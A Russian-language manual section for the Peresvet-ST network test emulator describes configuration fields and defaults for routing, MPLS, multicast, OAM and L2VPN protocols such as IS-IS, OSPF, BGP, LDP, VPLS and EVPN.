Внутренние Ethernet-заголовки (Inner L2)

Параметры внутреннего (оригинального) Ethernet-кадра, который будет инкапсулирован в VxLAN-пакет.

ПолеОписаниеЗначение по умолчанию
Inner Source MACMAC-адрес источника во внутреннем Ethernet-заголовке. Эмулирует MAC-адрес виртуальной машины или хоста за локальным VTEP
Inner Destination MACMAC-адрес назначения во внутреннем Ethernet-заголовке. Эмулирует MAC-адрес виртуальной машины или хоста за удалённым VTEP

Структура VxLAN-пакета

Итоговая структура каждого сгенерированного пакета при включённом VxLAN:

┌──────────────────────────────────────────────────┐
│ Outer Ethernet Header (14 байт) │ ← MAC интерфейса → MAC шлюза
├──────────────────────────────────────────────────┤
│ Outer IP Header (20 байт) │ ← Локальный VTEP IP → Удалённый VTEP IP
├──────────────────────────────────────────────────┤
│ Outer UDP Header (8 байт) │ ← Source port (энтропия) → Dest port: 4789
├──────────────────────────────────────────────────┤
│ VxLAN Header (8 байт) │ ← Flags + VNI
├──────────────────────────────────────────────────┤
│ Inner Ethernet Header (14 байт) │ ← Inner Source MAC → Inner Dest MAC
├──────────────────────────────────────────────────┤
│ Inner IP / TCP / UDP / HTTP / ... │ ← Полезная нагрузка плагина
└──────────────────────────────────────────────────┘

Примечание: VxLAN-инкапсуляция добавляет 50 байт служебных заголовков к каждому пакету. Рекомендуется учитывать это при настройке MTU на underlay-сети (стандартное значение MTU для VxLAN underlay — 1550 или 9000 при использовании Jumbo Frames). Внешний UDP Source Port генерируется автоматически на основе параметров внутреннего потока для обеспечения равномерного распределения трафика (ECMP) в underlay-сети.


IS-IS

IS-IS (Intermediate System to Intermediate System) — протокол маршрутизации внутри автономной системы, широко применяемый в сетях операторов связи. Пересвет-СТ может эмулировать один или несколько IS-IS экземпляров, каждый из которых ведёт себя как полноценный маршрутизатор: выполняет синхронизацию базы данных и наводнение LSP.

Основные настройки IS-IS

ПолеОписаниеЗначение по умолчанию
Включить IS-ISВключение/выключение протокола IS-ISВыкл.
LevelУровень IS-IS: L1, L2 или L1/L2L1
System IDИдентификатор системы, например 0100.0000.00010100.1001.0010
Router IDИдентификатор маршрутизатора, например 10.10.10.210.10.10.10
HostnameИмя хоста маршрутизатора, например R1bngblaster
AreasСписок зон IS-IS (добавление через кнопку «+ Add area»)49.0001/24

Протоколы IS-IS

ПолеОписаниеЗначение по умолчанию
Protocol IPv4Включение маршрутизации IPv4Вкл.
Protocol IPv6Включение маршрутизации IPv6Выкл.

Таймеры IS-IS

ПолеОписаниеЗначение по умолчанию
Hello interval (s)Интервал отправки Hello-пакетов, в секундах10
Hold time (s)Время удержания соседства, в секундах30
LSP lifetime (s)Время жизни LSP, в секундах65535
LSP refresh intervalИнтервал обновления LSP, в секундах300
LSP retry intervalИнтервал повторной отправки LSP при ошибке, в секундах5
LSP TX intervalИнтервал окна отправки LSP, в миллисекундах10
LSP TX window sizeКоличество LSP, отправляемых в одном окне1
LSP buffer sizeРазмер буфера LSP, в байтах1492
CSNP intervalИнтервал CSNP, в секундах30
Teardown time (s)Время завершения сессии, в секундах5
Hello paddingВключение дополнения Hello-пакетов до MTUВыкл.

Аутентификация IS-IS — Уровень 1 и Уровень 2

Настройки аутентификации задаются отдельно для каждого уровня IS-IS.

ПолеОписание
Auth typeТип аутентификации: none, simple (текстовый пароль) или md5
Auth keyКлюч аутентификации
Auth helloВключить аутентификацию в Hello-пакетах
Auth CSNPВключить аутентификацию в CSNP-пакетах
Auth PSNPВключить аутентификацию в PSNP-пакетах

Segment Routing IS-IS

ПолеОписаниеЗначение по умолчанию
SR AlgorithmАлгоритм Segment Routing0
SRGB BaseНачальное значение диапазона глобальных блоков SR0
SRGB RangeРазмер диапазона SRGB0
Node SIDNode SID для данного экземпляра IS-IS0
Adjacency SID BaseБазовое значение для генерации Adjacency SID0 (отключено)

Генерация топологии IS-IS

Пересвет-СТ позволяет автоматически сгенерировать эмулированную топологию IS-IS. Это позволяет быстро создать сеть из заданного количества виртуальных узлов без ручной конфигурации каждого из них.

ПолеОписаниеЗначение по умолчанию
Включить генерациюВключение автоматической генерации топологииВыкл.
Тип топологииТип генерируемой топологии: Ring, и др.Ring
Количество узловЧисло генерируемых виртуальных узлов10
Area IDИдентификатор зоны IS-IS49.0001/24
System ID StartНачальный System ID для генерируемых узлов1337.0000.0001
Loopback StartНачальный адрес loopback-интерфейса10.0.0.1
LevelУровень IS-IS для генерируемой топологииL2
МетрикаМетрика IS-IS для межузловых связей10
Prefix StartНачальный префикс для анонсирования10.100.0.0/24
Prefix CountКоличество префиксов на узел1
Prefix MetricМетрика для анонсируемых префиксов0
Branch FactorКоэффициент ветвления (для топологий типа дерево)2
IPv6Включение поддержки IPv6 в генерируемой топологииВыкл.
SRGB BaseНачало диапазона SRGB для генерируемой топологии1000
SRGB RangeРазмер диапазона SRGB для генерируемой топологии100

Для запуска генерации топологии нажмите кнопку «Сгенерировать».


OSPFv2

OSPFv2 (Open Shortest Path First version 2) — протокол маршрутизации для IPv4, широко используемый в корпоративных и операторских сетях. Пересвет-СТ эмулирует OSPFv2-узел с поддержкой Segment Routing и генерацией топологии.

Основные настройки OSPFv2

ПолеОписаниеЗначение по умолчанию
Включить OSPFv2Включение/выключение протокола OSPFv2Выкл.
VersionВерсия OSPF (фиксировано)2
Router IDИдентификатор OSPF-маршрутизатора, например 10.10.10.2
AreaИдентификатор зоны OSPF0.0.0.0
HostnameИмя хоста маршрутизатора

Таймеры OSPFv2

ПолеОписаниеЗначение по умолчанию
Hello interval (s)Интервал Hello-пакетов, в секундах10
Dead interval (s)Интервал объявления соседа недоступным, в секундах40
LSA retry intervalИнтервал повторной отправки LSA, в секундах0
Router priorityПриоритет маршрутизатора при выборе DR/BDR0
Teardown time (s)Время завершения сессии, в секундах0

Аутентификация OSPFv2

ПолеОписание
Auth typeТип аутентификации: none, simple или md5
Auth keyКлюч аутентификации

Segment Routing OSPFv2

ПолеОписаниеЗначение по умолчанию
SRGB BaseНачало глобального блока SR0
SRGB RangeРазмер диапазона SRGB0
Node SIDNode SID для данного экземпляра OSPF0

Генерация топологии OSPFv2

ПолеОписаниеЗначение по умолчанию
Включить генерациюВключение автоматической генерации OSPFv2-топологииВыкл.
Тип топологииТип генерируемой топологии: Ring, и др.Ring
Количество узловЧисло генерируемых виртуальных OSPF-узлов10
Area IDИдентификатор зоны OSPF0.0.0.0
Loopback StartНачальный адрес loopback-интерфейса10.0.0.1
Link Subnet StartНачальная подсеть для межузловых линков172.16.0.0/31
МетрикаМетрика OSPF для межузловых линков10
Prefix CountКоличество префиксов на узел1
Branch FactorКоэффициент ветвления2
SRGB BaseНачало диапазона SRGB1000
SRGB RangeРазмер диапазона SRGB100

Для запуска генерации топологии нажмите кнопку «Сгенерировать».


OSPFv3

OSPFv3 — версия протокола OSPF с поддержкой IPv6. Интерфейс настройки аналогичен OSPFv2 и содержит те же секции: основные настройки, таймеры, аутентификация, Segment Routing и генерация топологии.

Основные настройки OSPFv3

ПолеОписаниеЗначение по умолчанию
Включить OSPFv3Включение/выключение протокола OSPFv3Выкл.
VersionВерсия OSPF (фиксировано)3
Router IDИдентификатор OSPF-маршрутизатора
AreaИдентификатор зоны OSPF0.0.0.0
HostnameИмя хоста маршрутизатора

Таймеры OSPFv3

ПолеОписаниеЗначение по умолчанию
Hello interval (s)Интервал Hello-пакетов, в секундах10
Dead interval (s)Интервал объявления соседа недоступным, в секундах40
LSA retry intervalИнтервал повторной отправки LSA, в секундах0
Router priorityПриоритет маршрутизатора0
Teardown time (s)Время завершения сессии, в секундах0

Аутентификация OSPFv3

ПолеОписание
Auth typeТип аутентификации: none, simple или md5
Auth keyКлюч аутентификации

Segment Routing OSPFv3

ПолеОписаниеЗначение по умолчанию
SRGB BaseНачало глобального блока SR0
SRGB RangeРазмер диапазона SRGB0
Node SIDNode SID0

Генерация топологии OSPFv3

Параметры генерации топологии для OSPFv3 аналогичны OSPFv2. Дополнительно доступны поля Link Subnet Start, Prefix Count, Branch Factor, SRGB Base, SRGB Range. Для запуска нажмите кнопку «Сгенерировать».


BGP

BGP (Border Gateway Protocol) — стандартный протокол внешней маршрутизации для обмена маршрутной информацией между автономными системами. В Пересвет-СТ реализован механизм эмуляции BGP-сессий с поддержкой массовой генерации префиксов (BGP Updates).

Создание и управление BGP-сессиями

Для добавления новой BGP-сессии нажмите кнопку «+ Создать BGP сессию». Каждая сессия отображается как отдельная вкладка (Сессия #1, Сессия #2 и т.д.) и может быть удалена кнопкой «×».

Настройки BGP-сессии

Семейства адресов (Address Families)

В рамках каждой BGP-сессии задаётся набор поддерживаемых семейств адресов, передаваемых в OPEN-сообщении:

СемействоОписание
ipv4-unicastIPv4 одноадресная маршрутизация
ipv6-unicastIPv6 одноадресная маршрутизация
ipv4-multicastIPv4 многоадресная маршрутизация
ipv6-multicastIPv6 многоадресная маршрутизация
ipv4-labeled-unicastIPv4 с метками (MPLS)
ipv6-labeled-unicastIPv6 с метками (MPLS)
ipv4-vpn-unicastIPv4 VPN
ipv6-vpn-unicastIPv6 VPN
evpnEthernet VPN (EVPN)

Таймеры BGP-сессии

ПолеОписаниеЗначение по умолчанию
Hold time (s)Hold time в секундах90
TTLTTL для BGP-пакетов64
ToSIP ToS (DSCP) для BGP-пакетов0
ReconnectАвтоматическое переподключение сессииВкл.
Teardown time (s)Время завершения сессии, в секундах0

BGP Updates (генерация префиксов)

Раздел «BGP Updates» позволяет настроить автоматическую генерацию и анонсирование большого количества BGP-префиксов. Каждый блок Update (#1, #2 и т.д.) задаёт один пакет обновлений. Для добавления нового блока используйте кнопку «+ Добавить update».

ПолеОписаниеЗначение по умолчанию
ASNНомер автономной системы источника0
Next-hop baseБазовый адрес next-hop для анонсируемых маршрутов
Next-hop countКоличество next-hop адресов1
Local prefЗначение Local Preference0
Label baseБазовая метка MPLS0
End-of-RIBОтправка маркера End-of-RIB после передачи всех обновленийВыкл.
Базовый префиксНачальный префикс для генерации, например 10.0.0.0/24
КоличествоЧисло генерируемых префиксов10

После заполнения параметров нажмите кнопку «Сгенерировать» — список сгенерированных префиксов отобразится в поле Prefixes (one per line).


LDP

LDP (Label Distribution Protocol) — протокол распределения меток MPLS. Два устройства с установленной LDP-сессией называются LDP-пирами и обмениваются метками двунаправленно. LDP используется для построения и поддержки баз данных LSP, обеспечивающих пересылку трафика в MPLS-сетях.

Обнаружение LDP выполняется по UDP-порту 646; сессия устанавливается по TCP-порту 646. В фазе обнаружения Hello-пакеты рассылаются на групповой адрес 224.0.0.2.

Основные настройки LDP

ПолеОписаниеЗначение по умолчанию
Включить LDPВключение/выключение протокола LDPВыкл.
LSR IDИдентификатор LSR-маршрутизатора, например 10.10.10.210.10.10.10
HostnameИмя хостаbngblaster
IPv4 transport addressАдрес транспортного интерфейса IPv4(равен LSR ID)
IPv6 transport addressАдрес транспортного интерфейса IPv6
No IPv4 transportОтключить IPv4 LDP Hello-сообщенияВыкл.
Prefer IPv4 transportПредпочитать IPv4-транспорт при наличии IPv6Выкл.

Таймеры LDP

ПолеОписаниеЗначение по умолчанию
Keepalive time (s)Таймаут keepalive LDP-сессии, в секундах0
Hold time (s)Hold time для LDP Hello, в секундах0
Teardown time (s)Время завершения сессии, в секундах0

Источник префиксов (из IGP)

LDP может автоматически получать префиксы из IGP (протокола внутренней маршрутизации) для построения MPLS LSP.

ПолеОписаниеЗначение
Enable prefix sourceВключить получение префиксов из IGPВкл.
ProtocolПротокол-источник: ISIS или OSPFISIS
ModeРежим выбора префиксов: loopbacks (только loopback-адреса) или allloopbacks
Label baseБазовое значение метки для назначения16000

LLDP

LLDP (Link Layer Discovery Protocol) — протокол канального уровня, описанный в стандарте IEEE 802.1AB. Используется для обмена информацией о сетевых устройствах между непосредственно подключёнными соседями. Пересвет-СТ эмулирует LLDP-агент, который периодически отправляет LLDP-кадры (LLDPDU) на стандартный групповой MAC-адрес 01:80:c2:00:00:0e, позволяя тестируемому оборудованию обнаруживать эмулированное устройство, его идентификаторы и характеристики.

Основные настройки LLDP

ПолеОписаниеЗначение по умолчанию
Включить LLDPВключение/выключение протокола LLDPВыкл.
Chassis ID подтипСпособ идентификации шасси устройства: MAC address, Network address, Interface name, Locally assignedMAC address
Chassis IDИдентификатор шасси. При подтипе «MAC address» — MAC-адрес интерфейса; при подтипе «Locally assigned» — произвольная строка(MAC-адрес интерфейса)
Port ID подтипСпособ идентификации порта: MAC address, Interface name, Locally assignedMAC address
Port IDИдентификатор порта. При подтипе «MAC address» — MAC-адрес интерфейса; при подтипе «Interface name» — имя интерфейса(MAC-адрес интерфейса)
System NameИмя системы, передаваемое в TLV System Name
System DescriptionОписание системы, передаваемое в TLV System Description
Port DescriptionОписание порта, передаваемое в TLV Port Description

Таймеры LLDP

ПолеОписаниеЗначение по умолчанию
TX Interval (s)Интервал между отправкой LLDP-кадров, в секундах30
TX Hold MultiplierМножитель, определяющий TTL LLDP-кадра по формуле: TTL = TX Interval × TX Hold Multiplier4
TTL (s)Время жизни LLDP-информации на принимающей стороне (вычисляется автоматически из TX Interval и TX Hold Multiplier). По истечении TTL сосед считается недоступным120

Возможности системы (System Capabilities)

Раздел позволяет указать, какие функциональные возможности заявляет эмулируемое устройство в TLV System Capabilities.

ПолеОписаниеЗначение по умолчанию
Supported CapabilitiesСписок поддерживаемых возможностей устройства: Other, Repeater, Bridge, WLAN Access Point, Router, Telephone, DOCSIS Cable Device, Station OnlyRouter
Enabled CapabilitiesСписок активных возможностей устройства (подмножество поддерживаемых)Router

Management Address

Настройка адреса управления, передаваемого в TLV Management Address. Позволяет тестируемому устройству определить IP-адрес для управления эмулированным соседом.

ПолеОписаниеЗначение по умолчанию
Management AddressIP-адрес управления, например 10.10.10.2(IP-адрес интерфейса)
Address SubtypeТип адреса управления: IPv4, IPv6IPv4
Interface SubtypeТип интерфейса: ifIndex, System port numberifIndex
Interface NumberЧисловой идентификатор интерфейса0

BFD

BFD (Bidirectional Forwarding Detection) настраивается в разделе Control Plane страницы задачи. Протокол обеспечивает быстрое обнаружение отказов на канальном уровне между соседними устройствами и может использоваться совместно с протоколами маршрутизации (BGP, OSPF, IS-IS) для ускорения переключения на резервные маршруты.

RIP

RIP используется для проверки обмена маршрутами в простых IPv4-сетях и в стендах, где нужно убедиться, что тестируемое устройство корректно принимает, распространяет или фильтрует RIP-анонсы. В Пересвет-СТ RIP задается как отдельный инстанс и привязывается к сетевому интерфейсу Control Plane.

Табл. 168.1 – Параметры RIP

НазваниеОписаниеЗначение
Instance IDИдентификатор RIP-инстансаУкажите номер, который затем выбирается в настройках интерфейса
Update intervalИнтервал отправки маршрутных обновленийПо умолчанию 30 секунд
Timeout intervalВремя, после которого маршрут считается недоступным без обновленийПо умолчанию 180 секунд
GC intervalВремя удержания удаленного маршрута перед очисткойПо умолчанию 120 секунд
Split horizonЗапрет анонса маршрута обратно на интерфейс, с которого он был полученРекомендуется оставить включенным для стандартных сценариев
Poison reverseАнонс обратного маршрута с недостижимой метрикойВключите, если нужно проверить обработку poison reverse
Default metricМетрика по умолчанию для добавляемых маршрутовПо умолчанию 1
AuthenticationТип аутентификации RIPnone или режим, согласованный со стендом
Auth keyКлюч аутентификацииЗаполняется, если включена аутентификация
Teardown timeВремя корректного завершения RIP после остановки задачи0 - без дополнительной задержки
RoutesСписок анонсируемых маршрутовДобавьте префикс, метрику и next-hop для каждого маршрута

В списке маршрутов указывается префикс, метрика и next-hop. Используйте несколько записей, если нужно проверить реакцию маршрутизатора на набор клиентских или сервисных сетей. Для проверки отказоустойчивости можно запускать задачу с разными наборами маршрутов и сравнивать, как быстро тестируемое устройство обновляет таблицу маршрутизации.

IGMP Querier

IGMP Querier эмулирует источник общих запросов IGMP в IPv4 multicast-сегменте. Протокол применяется, когда нужно проверить работу multicast-подписок, поведение коммутаторов и маршрутизаторов при наличии querier, а также корректность обработки групп получателями.

Табл. 168.2 – Параметры IGMP Querier

НазваниеОписаниеЗначение
Instance IDИдентификатор IGMP QuerierУкажите номер и привяжите его к интерфейсу Control Plane
VersionВерсия IGMPОбычно 2; выберите версию, которую ожидает тестируемая сеть
Query intervalИнтервал отправки общих запросовПо умолчанию 125 секунд
Query response intervalМаксимальное время ожидания ответа на запросУказывается в 0,1 секунды; 100 = 10 секунд
RobustnessКоэффициент устойчивости к потере сообщенийПо умолчанию 2
Last member query intervalИнтервал повторного запроса при уходе последнего участника группыУказывается в 0,1 секунды; 10 = 1 секунда
Last member query countКоличество повторных запросов для последнего участникаПо умолчанию 2
Teardown timeЗадержка завершения после остановки задачи0 - завершать без дополнительной задержки

IGMP Querier должен быть привязан к интерфейсу, где ожидаются multicast-получатели. В результатах проверяйте наличие групп, количество участников и изменение состояния после Join/Leave. Если multicast-группы не появляются, сначала проверьте VLAN, IP-сеть интерфейса и совпадение версии IGMP.

MLD Querier

MLD Querier выполняет аналогичную роль для IPv6 multicast. Он отправляет MLD-запросы и позволяет проверять, как оборудование ведет учет IPv6 multicast-групп и участников.

Табл. 168.3 – Параметры MLD Querier

НазваниеОписаниеЗначение
Instance IDИдентификатор MLD QuerierУкажите номер и привяжите его к IPv6-интерфейсу
VersionВерсия MLDОбычно 2
Query intervalИнтервал отправки MLD-запросовПо умолчанию 125 секунд
Query response intervalМаксимальное время ожидания ответа от участника группыУказывается в миллисекундах; 10000 = 10 секунд
RobustnessКоэффициент устойчивости к потере сообщенийПо умолчанию 2
Last member query intervalИнтервал запроса после ухода участникаУказывается в миллисекундах; 1000 = 1 секунда
Last member query countКоличество повторных запросовПо умолчанию 2
Teardown timeЗадержка завершения после остановки задачи0 - завершать без дополнительной задержки

MLD используется только в IPv6-сегменте. Перед запуском убедитесь, что на интерфейсе задачи задан IPv6-адрес или включена соответствующая IPv6-конфигурация, а тестируемое устройство ожидает MLD именно на этом линке.

PIM

PIM используется для проверки multicast routing. В Пересвет-СТ можно настроить PIM-инстанс, привязать его к интерфейсу и задать группы, источники, RP или SSM-сценарии. Такой тест полезен для проверки маршрутизаторов multicast, RP-настроек, PIM-соседств и распространения Join/Prune-сообщений.

Табл. 168.4 – Параметры PIM

НазваниеОписаниеЗначение
Instance IDИдентификатор PIM-инстансаУкажите номер и выберите его в настройках интерфейса
Hello intervalИнтервал отправки PIM HelloПо умолчанию 30 секунд
Hello holdtimeВремя удержания PIM-соседа без Hello0 - использовать значение по умолчанию протокола
DR priorityПриоритет при выборе Designated RouterПо умолчанию 1
Join/Prune intervalИнтервал отправки Join/PruneПо умолчанию 60 секунд
Join/Prune holdtimeВремя удержания состояния Join/Prune0 - использовать значение по умолчанию
SSMРежим Source-Specific MulticastВключите для сценариев с конкретными источниками
RP addressАдрес Rendezvous PointЗаполняется для ASM-сценариев
Teardown timeВремя корректного завершения PIMПо умолчанию 10 секунд
GroupsMulticast-группы и источникиУкажите адрес группы, источники, начальный адрес и количество

Для ASM-сценариев задайте RP address и группы. Для SSM-сценариев включите SSM и укажите источники. В метриках и логах проверяйте состояние PIM-соседства, группы и появление ожидаемых Join/Prune-событий.

Link OAM применяется для проверки Ethernet OAM на канальном уровне. Он помогает убедиться, что оборудование корректно обнаруживает OAM-соседа, поддерживает keepalive, loopback и события линии. Протокол особенно полезен при проверке операторских Ethernet-сервисов и диагностики L2-доступа.

Табл. 168.5 – Параметры Link OAM

НазваниеОписаниеЗначение
Instance IDИдентификатор Link OAM-инстансаУкажите номер и привяжите его к интерфейсу
ModeРежим работы OAMactive для инициативного обмена или режим, согласованный со стендом
Keepalive intervalИнтервал OAM keepaliveПо умолчанию 1 секунда
Hold timeВремя ожидания без keepalive до потери соседаПо умолчанию 5 секунд
Max PDU sizeМаксимальный размер OAM PDUПо умолчанию 1518 байт
Loopback supportПоддержка remote loopbackВключите для проверки loopback-сценариев
Link events supportПоддержка событий линииВключите для проверки fault-событий
Variable retrievalПоддержка запроса переменныхВключите, если оборудование использует этот механизм
Unidirectional supportПоддержка однонаправленных событийВключите при проверке диагностики односторонних отказов
OUIИдентификатор производителяЗаполните при необходимости
Vendor infoДополнительная vendor-информацияИспользуется для специализированных стендов

После запуска задачи проверяйте состояние OAM-сессии и счетчики OAM PDU. Если сосед не поднимается, сначала проверьте L2-связность, VLAN и режим OAM на обеих сторонах.

mLDP

mLDP расширяет LDP для multicast LSP и используется в операторских MPLS-сценариях, где нужно проверить P2MP или MP2MP-деревья. В Пересвет-СТ mLDP работает поверх уже настроенного LDP-инстанса: сначала создайте LDP, затем добавьте mLDP и укажите, какой LDP-инстанс используется как транспорт.

Табл. 168.6 – Параметры mLDP

НазваниеОписаниеЗначение
Instance IDИдентификатор mLDP-инстансаУкажите уникальный номер
LDP instance IDLDP-инстанс, поверх которого работает mLDPДолжен ссылаться на существующий LDP
Local label baseБазовая метка для mLDPПо умолчанию 200000
P2MP capabilityПоддержка point-to-multipoint деревьевВключите для P2MP-сценариев
MP2MP capabilityПоддержка multipoint-to-multipoint деревьевВключите для MP2MP-сценариев
Tree templatesШаблоны multicast-деревьевДобавьте тип дерева, роль, root address, LSP ID и количество

Табл. 168.7 – Шаблон дерева mLDP

НазваниеОписаниеЗначение
TypeТип дереваp2mp или mp2mp
RoleРоль эмулируемого узлаroot или leaf в зависимости от сценария
Root addressАдрес корня дереваУкажите адрес PE/LSR, который является root
Root address iterИнкремент адреса корняИспользуется для массовой генерации
LSP ID startНачальный LSP IDПо умолчанию 1
CountКоличество деревьевУкажите число создаваемых деревьев

Используйте mLDP, когда нужно проверить не только обмен unicast-метками, но и построение multicast-доставки поверх MPLS. В результатах обращайте внимание на состояние LDP-сессии: без нее mLDP-деревья не смогут корректно согласоваться.

MPLS OAM

MPLS OAM используется для проверки контроля связности, диагностики отказов и измерения качества MPLS-сервисов. В Пересвет-СТ можно описать label stack, включить CC/CV, AIS/LCK, delay measurement и loss measurement, а также связать OAM с конкретным интерфейсом или MPLS-TP LSP.

Табл. 168.8 – Параметры MPLS OAM

НазваниеОписаниеЗначение
Instance IDИдентификатор MPLS OAM-инстансаУкажите уникальный номер
Network interfaceИнтерфейс, на котором работает OAMВыберите интерфейс Control Plane
Label stackНабор MPLS-меток для проверкиДобавьте label, EXP и TTL для каждой метки
Transport label / EXP / TTLТранспортная метка и параметры заголовкаИспользуется для LSP/OAM-проверок
PW label / EXP / TTLМетка pseudowire и параметры заголовкаИспользуется для PW-сервисов
CC enabledContinuity CheckВключите для регулярной проверки связности
CC intervalИнтервал CC-сообщенийПо умолчанию 1000
CV enabledConnectivity VerificationВключите для проверки корректности пути
MEP ID / Remote MEP IDИдентификаторы локальной и удаленной точки обслуживанияУкажите в соответствии со стендом
Global ID / Node IDИдентификаторы MPLS-TP/OAM endpointЗаполняются при использовании MPLS-TP
Tunnel num / LSP numИдентификаторы туннеля и LSPИспользуются для связи с MPLS-TP
AIS enabled / intervalAlarm Indication SignalВключите для проверки сигнализации аварий
LCK enabled / intervalLock InstructВключите для проверки состояния административной блокировки
DM enabled / intervalDelay MeasurementВключите для измерения задержки
LM enabled / intervalLoss MeasurementВключите для оценки потерь

Для базовой проверки связности достаточно label stack и CC/CV. Для эксплуатационных испытаний MPLS-сервиса включайте также DM/LM и сравнивайте результаты с политиками качества сервиса на тестируемом оборудовании.

MPLS-TP

MPLS-TP используется для проверки транспортных MPLS-туннелей, в том числе рабочих и защитных путей. Протокол описывает идентификаторы туннеля, прямые и обратные метки, тип защиты и связь с OAM.

Табл. 168.9 – Параметры MPLS-TP

НазваниеОписаниеЗначение
Instance IDИдентификатор MPLS-TP-инстансаУкажите уникальный номер
NameИмя туннеляИспользуйте понятное имя для анализа результатов
DirectionТип направления LSPНапример co-routed для согласованного прямого и обратного пути
Global ID / Node IDЛокальные идентификаторы узлаЗаполняются по схеме стенда
Tunnel num / LSP numЛокальные номера туннеля и LSPИспользуются для идентификации LSP
Remote Global ID / Remote Node IDИдентификаторы удаленного узлаДолжны соответствовать удаленной стороне
Remote tunnel num / Remote LSP numУдаленные номера туннеля и LSPИспользуются для пары endpoint
Working forward labelМетка рабочего прямого направленияУкажите label для основного пути
Working reverse labelМетка рабочего обратного направленияУкажите label обратного пути
Working EXP / TTLПараметры MPLS-заголовка рабочего путиНастройте при необходимости
Protection forward/reverse labelМетки защитного путиЗаполняются, если проверяется protection
Protection typeТип защитыnone или тип защиты, применяемый в стенде
RevertiveВозврат на рабочий путь после восстановленияВключите для revertive-сценариев
WTR timeWait-to-Restore timerПо умолчанию 300 секунд
Hold-off timeЗадержка перед переключением защитыПо умолчанию 0
PSC intervalИнтервал Protection State CoordinationПо умолчанию 5 секунд
Network interfaceРабочий интерфейсВыберите интерфейс основного пути
Protection interfaceИнтерфейс защитного путиВыберите при наличии резервного направления
OAM instance IDСвязанный MPLS OAM-инстансУкажите OAM, если нужно проверять состояние LSP

MPLS-TP рекомендуется настраивать вместе с MPLS OAM: OAM показывает доступность LSP, а MPLS-TP описывает рабочий и защитный путь. При анализе результатов проверяйте состояние LSP, события protection и задержки переключения.

Pseudowire

Pseudowire используется для проверки L2-сервисов поверх MPLS. С его помощью можно эмулировать Ethernet pseudowire к одному или нескольким удаленным PE, проверить согласование меток, MTU, control word и статус PW.

Табл. 168.10 – Параметры Pseudowire

НазваниеОписаниеЗначение
Instance IDИдентификатор набора pseudowireУкажите уникальный номер
PW typeТип pseudowireОбычно ethernet
Control wordИспользование control wordВключите, если он требуется в сервисе
MTUMTU pseudowireПо умолчанию 1500
PW status TLVПередача статуса PWВключите для проверки status-сценариев
LDP instance IDLDP-инстанс для сигнализацииДолжен ссылаться на существующий LDP
Local label baseБазовая локальная меткаПо умолчанию 5000
PW templatesШаблоны создаваемых pseudowireДобавьте удаленный PE, PW ID и количество

Табл. 168.11 – Шаблон Pseudowire

НазваниеОписаниеЗначение
PW ID startНачальный PW IDПо умолчанию 1
CountКоличество pseudowireУкажите число сервисов
Remote PEАдрес удаленного PEУкажите peer, с которым согласуется PW
Remote PE iterИнкремент удаленного PEИспользуется для массовой генерации
Group IDИдентификатор группы0 - без отдельной группировки
TransportТранспорт сигнализацииОбычно ldp
RSVP tunnel IDID RSVP-туннеляЗаполняется, если используется RSVP-транспорт

Если pseudowire не поднимается, проверьте LDP-сессию, совпадение PW ID, MTU, control word и меток на обеих сторонах.

VPLS

VPLS применяется для проверки multipoint L2VPN-сервисов, где несколько PE участвуют в одной виртуальной L2-сети. Пересвет-СТ может эмулировать VPLS-инстанс с LDP или BGP-сигнализацией, списком удаленных PE и параметрами pseudowire.

Табл. 168.12 – Параметры VPLS

НазваниеОписаниеЗначение
Instance IDИдентификатор VPLS-инстансаУкажите уникальный номер
VPLS IDИдентификатор VPLS-сервисаПо умолчанию 100
SignalingТип сигнализацииldp или bgp
LDP instance IDLDP-инстанс для LDP-сигнализацииЗаполняется при signaling = ldp
BGP session IDBGP-сессия для BGP-сигнализацииЗаполняется при signaling = bgp
Local VE IDЛокальный VE IDПо умолчанию 1
VE block offset / sizeПараметры блока VEИспользуются для BGP VPLS
Route DistinguisherRD сервисаНапример 65000:100
Route TargetRT import/exportУкажите RT, согласованный со стендом
LDP transport instance IDТранспортный LDP-инстансИспользуется при необходимости отдельного транспорта
Local label baseБазовая локальная меткаПо умолчанию 8000
PW typeТип pseudowireОбычно ethernet
Control wordИспользование control wordВключите, если требуется
PW status TLVПередача статуса PWВключено по умолчанию
MTUMTU сервиса0 - использовать значение по умолчанию
MAC withdrawalПередача MAC withdrawalВключено по умолчанию
PE listСписок удаленных PEДобавьте адрес PE и VE ID

VPLS удобно использовать для проверки L2VPN-сервисов, MAC learning и реакции сети на изменение PE. Для BGP-сигнализации убедитесь, что создана BGP-сессия с нужными семействами адресов, для LDP-сигнализации - что поднят LDP.

VPWS

VPWS используется для point-to-point L2VPN-сервиса между двумя PE. В отличие от VPLS, VPWS описывает выделенную L2-связь с конкретным удаленным PE и удаленным VE ID.

Табл. 168.13 – Параметры VPWS

НазваниеОписаниеЗначение
Instance IDИдентификатор VPWS-инстансаУкажите уникальный номер
VPWS IDИдентификатор сервисаПо умолчанию 200
BGP session IDBGP-сессия для сигнализацииУкажите ID существующей BGP-сессии
Local VE IDЛокальный VE IDПо умолчанию 1
Local label baseБазовая локальная меткаПо умолчанию 2000
VE block offset / sizeПараметры блока VEИспользуются для генерации service endpoint
Route DistinguisherRD сервисаНапример 65000:200
Route TargetRT import/exportУкажите RT сервиса
LDP transport instance IDТранспортный LDP-инстансЗаполняется при необходимости MPLS-транспорта
PW typeТип pseudowireОбычно ethernet
Control wordИспользование control wordВключено по умолчанию
PW status TLVПередача статуса PWВключено по умолчанию
MTUMTU сервиса0 - использовать значение по умолчанию
Remote PEАдрес удаленного PEУкажите PE противоположной стороны
Remote VE IDVE ID удаленной стороныПо умолчанию 2

VPWS подходит для проверки выделенных L2-каналов, межплощадочных Ethernet-сервисов и корректности сигнализации BGP/LDP вокруг точка-точка подключения.

EVPN и PBB-EVPN

EVPN используется для проверки Ethernet VPN-сервисов поверх BGP. Он позволяет эмулировать EVI, локальные MAC/IP, Route Distinguisher, Route Target и метки. PBB-EVPN расширяет сценарий параметрами backbone MAC, I-SID и B-VID для сетей, где используется Provider Backbone Bridging.

Табл. 168.14 – Параметры EVPN

НазваниеОписаниеЗначение
Instance IDИдентификатор EVPN-инстансаУкажите уникальный номер
EVIEVPN Instance IDПо умолчанию 100
ModeРежим EVPNevpn или PBB-EVPN-режим, если используется
Local labelЛокальная MPLS-меткаПо умолчанию 50000
BGP session IDBGP-сессия для EVPNУкажите ID BGP-сессии
Route DistinguisherRD EVPN-инстансаНапример 65000:100
Route TargetRT import/exportУкажите RT сервиса
Ethernet tagEthernet Tag ID0 для простого сценария
LDP transport instance IDТранспортный LDP-инстансИспользуется при необходимости
MTUMTU сервисаПо умолчанию 1500
